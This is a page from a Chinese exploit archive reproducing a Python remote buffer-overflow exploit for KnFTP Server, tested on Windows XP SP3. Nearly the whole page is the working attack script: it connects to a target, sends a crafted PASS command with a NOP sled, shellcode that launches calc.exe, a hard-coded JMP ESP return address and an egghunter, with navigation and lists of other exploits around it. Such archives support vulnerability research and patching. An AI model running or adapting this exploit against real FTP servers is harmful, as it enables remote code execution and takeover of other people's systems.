首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
KnFTP Server Buffer Overflow Exploit
来源:vfocus.net 作者:Blake 发布时间:2011-09-13  

#!/usr/bin/python
# tested on windows xp sp3
# overwrites EIP
# seh is overwritten with larger payloads
# knftpd.exe is the only non safeseh module
import sys,socket

print "\n====================="
print "KnFTP Buffer Overflow"
print "   Written by Blake  "
print "=====================\n"

if len(sys.argv) !=3:
 print "[*] Usage: %s <ip> <port>" % sys.argv[0]
 sys.exit(0)

target = sys.argv[1]
port = int(sys.argv[2])

# 271 bytes of space for shellcode
# 227 bytes windows/exec CMD => calc.exe
shellcode =(
"\xb8\xe8\xaa\x5e\xc0\xdb\xd6\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x33\x31\x43\x12\x03\x43\x12\x83\x03\x56\xbc\x35\x2f\x4f\xc8"
"\xb6\xcf\x90\xab\x3f\x2a\xa1\xf9\x24\x3f\x90\xcd\x2f\x6d\x19"
"\xa5\x62\x85\xaa\xcb\xaa\xaa\x1b\x61\x8d\x85\x9c\x47\x11\x49"
"\x5e\xc9\xed\x93\xb3\x29\xcf\x5c\xc6\x28\x08\x80\x29\x78\xc1"
"\xcf\x98\x6d\x66\x8d\x20\x8f\xa8\x9a\x19\xf7\xcd\x5c\xed\x4d"
"\xcf\x8c\x5e\xd9\x87\x34\xd4\x85\x37\x45\x39\xd6\x04\x0c\x36"
"\x2d\xfe\x8f\x9e\x7f\xff\xbe\xde\x2c\x3e\x0f\xd3\x2d\x06\xb7"
"\x0c\x58\x7c\xc4\xb1\x5b\x47\xb7\x6d\xe9\x5a\x1f\xe5\x49\xbf"
"\x9e\x2a\x0f\x34\xac\x87\x5b\x12\xb0\x16\x8f\x28\xcc\x93\x2e"
"\xff\x45\xe7\x14\xdb\x0e\xb3\x35\x7a\xea\x12\x49\x9c\x52\xca"
"\xef\xd6\x70\x1f\x89\xb4\x1e\xde\x1b\xc3\x67\xe0\x23\xcc\xc7"
"\x89\x12\x47\x88\xce\xaa\x82\xed\x21\xe1\x8f\x47\xaa\xac\x45"
"\xda\xb7\x4e\xb0\x18\xce\xcc\x31\xe0\x35\xcc\x33\xe5\x72\x4a"
"\xaf\x97\xeb\x3f\xcf\x04\x0b\x6a\xac\xcb\x9f\xf6\x1d\x6e\x18"
"\x9c\x61")

# 32 byte egghunter
egghunter =(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
"\x54\x30\x30\x57" # egg - W00T
"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

egg = "\x54\x30\x30\x57\x54\x30\x30\x57"
buffer = "\x90" * (271 - len(egg + shellcode))
eip = "\x13\x44\x87\x7c"  # 7C874413 JMP ESP - kernel32.dll
nops = "\x90" * 8

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Connecting to %s on port %d" % (target,port)
try:
 s.connect((target,port))
 print "[+] Sending payload"
 s.send("USER blake \r\n")
 s.recv(1024)
 s.send("PASS " + buffer + egg + shellcode + eip + nops + egghunter + "\r\n")
 s.recv(1024)
 s.close()
 print "[+] Payload sent successfully"
 raw_input("[+] Press any key to exit\n")
except:
 print "[+] Could not connect to %s!" % target
 sys.exit(0)



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ScadaTEC ModbusTagServer & Sca
·Aika 0.2 colladaconverter Xml
·Mel0nPlayer 1.0.11.x Denial of
·Wav Player 1.1.3.6 .pll Buffer
·BisonFTP Server Remote Buffer
·Wing FTP Server USER Buffer Ov
·Procyon Core Server HMI <= v1.
·PHP "phar/phar_object.c" forma
·Microsoft WINS Service <= 5.2.
·N-TRACK Studio universal Local
·MS WINS ECommEndDlg Input Vali
·WVxWorks FTP server Password O
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved